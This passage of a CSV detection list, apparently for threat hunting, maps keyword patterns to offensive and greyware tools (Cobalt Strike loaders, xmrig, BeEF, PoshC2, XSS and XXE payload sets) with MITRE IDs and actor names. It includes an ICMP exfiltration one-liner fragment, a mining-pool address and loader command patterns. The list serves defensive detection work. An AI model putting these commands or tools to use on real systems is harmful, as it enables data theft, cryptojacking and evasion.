TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*xmendez/wfuzz*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*XML-External-Entity-(XXE)-Payloads*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*xmrig-*-bionic-x64.tar.gz*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-focal-x64.tar.gz*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-freebsd-static-x64.tar.gz*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-gcc-win64.zip*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-linux-static-x64.tar.gz*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-linux-x64.tar.gz*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-macos-arm64.tar.gz*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-macos-x64.tar.gz*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-msvc-win64.zip*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig.exe -*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrpool.eu:3333*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xor.exe *.txt*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Loader by Golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/timwhitez/Doge-Loader,1,0,N/A,10,10,277,61,2021-04-22T08:24:59Z,2020-10-09T04:47:54Z -*xor.py *.dll*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,0,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*XOR_b64_encrypted*covenant.txt*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*XOR_b64_encrypted*covenant2.txt*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*XOR_b64_encrypted*havoc.txt*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*xor_payload*,offensive_tool_keyword,cobaltstrike,A simple python packer to easily bypass Windows Defender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Unknow101/FuckThatPacker,1,1,N/A,10,10,612,91,2022-04-03T18:20:01Z,2020-08-13T07:26:07Z -*xor-bin.py *.exe*,offensive_tool_keyword,PE-Obfuscator,PE obfuscator with Evasion in mind,T1027 - T1055 - T1140 - T1564.003 - T1027.002,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/PE-Obfuscator,1,0,N/A,N/A,2,196,38,2023-04-25T04:58:12Z,2023-04-25T04:00:15Z -*xoreaxeaxeax*,offensive_tool_keyword,Github Username,github username hosting obfuscation and exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/xoreaxeaxeax,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*XorEncoder.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*XOR-Payloads.py*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*xpipe \\*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/xPipe,1,0,N/A,10,10,73,21,2023-03-08T15:51:47Z,2021-12-07T22:56:30Z -*xpipe*lsass*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/xPipe,1,1,N/A,10,10,73,21,2023-03-08T15:51:47Z,2021-12-07T22:56:30Z -*xpipe.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/xPipe,1,1,N/A,10,10,73,21,2023-03-08T15:51:47Z,2021-12-07T22:56:30Z -*xpipe.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/xPipe,1,1,N/A,10,10,73,21,2023-03-08T15:51:47Z,2021-12-07T22:56:30Z -*xpipe.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/xPipe,1,1,N/A,10,10,73,21,2023-03-08T15:51:47Z,2021-12-07T22:56:30Z -*xpn*ntlmquic*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z -*xrdp.c*,offensive_tool_keyword,xrdp,xrdp provides a graphical login to remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp accepts connections from a variety of RDP clients: FreeRDP. rdesktop. NeutrinoRDP and Microsoft Remote Desktop Client (for Windows. Mac OS. iOS and Android).can be used by attacker,T1076 - T1021.003 - T1021.002,TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/neutrinolabs/xrdp,1,0,N/A,N/A,10,4820,2704,2023-10-02T15:48:32Z,2011-04-25T14:31:17Z -*xs.exe -connect *,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*xscreensaver_log_priv_esc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*xshell_xftp_password.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*XSpear -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*xspy -display*,offensive_tool_keyword,xspy -display,Keylogger Monitors keystrokes even the keyboard is grabbed.,T1056 - T1059 - T1007 - T1113,TA0006 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/mnp/xspy/blob/master/xspy.c,1,0,N/A,N/A,1,22,15,2018-03-19T12:16:25Z,2011-07-26T18:37:00Z -*xsrfprobe -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*xsser -u * -g */login?password=* --Coo*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*XSS-labs*,offensive_tool_keyword,xss-labs,small set of PHP scripts to practice exploiting XSS and CSRF injection vulns,T1059.003 - T1190 - T1600,TA0002 - TA0007 - ,N/A,N/A,Web Attacks,https://github.com/paralax/xss-labs,1,1,N/A,N/A,1,50,26,2017-12-22T19:38:15Z,2016-03-24T19:43:37Z -*XSS-Payloads*,offensive_tool_keyword,XSS-Payloads,A fine collection of selected javascript payloads.,T1059 - T1068 - T1071 - T1506,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Web Attacks,http://www.xss-payloads.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*xssrays.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*xssrays.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*xssrays_spec.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*xssraysdetail.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*xssraysscan.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*XSStrike*,offensive_tool_keyword,XSStrike,Advanced XSS detection and exploitation suite.,T1189,TA0001,N/A,N/A,Exploitation tools,https://github.com/UltimateHackers/XSStrike,1,0,N/A,N/A,10,12018,1823,2023-08-05T13:49:45Z,2017-06-26T07:24:44Z -*xxd -p -c 4 /* | while read line* do ping -c 1 -p *,greyware_tool_keyword,xxd,ICMP Tunneling One Liner,T1090 - T1002 - T1016,TA0011 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*XXEinjector*,offensive_tool_keyword,XXEinjector,XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.,T1573.001 - T1573.002 - T1574,TA0007 - ,N/A,N/A,Web Attacks,https://github.com/enjoiz/XXEinjector,1,1,N/A,N/A,10,1363,311,2020-08-27T12:33:26Z,2015-05-16T10:56:14Z -*xxePayloads.ini*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*XX-PHISHING-LINK-XX*,offensive_tool_keyword,bitb,Browser templates for Browser In The Browser (BITB) attack,T1056.001 - T1134 - T1090,TA0005 - TA0006 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/mrd0x/BITB,1,0,N/A,10,10,2645,463,2023-07-11T04:57:46Z,2022-03-15T16:51:39Z -*X-YSOSERIAL-NET*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*xZF7fvaGD6p2yeLyf9i7O9gBBHk05B0u*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*xzfbmR6MskR8J6Zr58RrhMc325kejLJE*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*Y29iYWx0c3RyaWtl*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Y2F0Y2hldHVtYm90aWZ5b3VjYW4-*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration 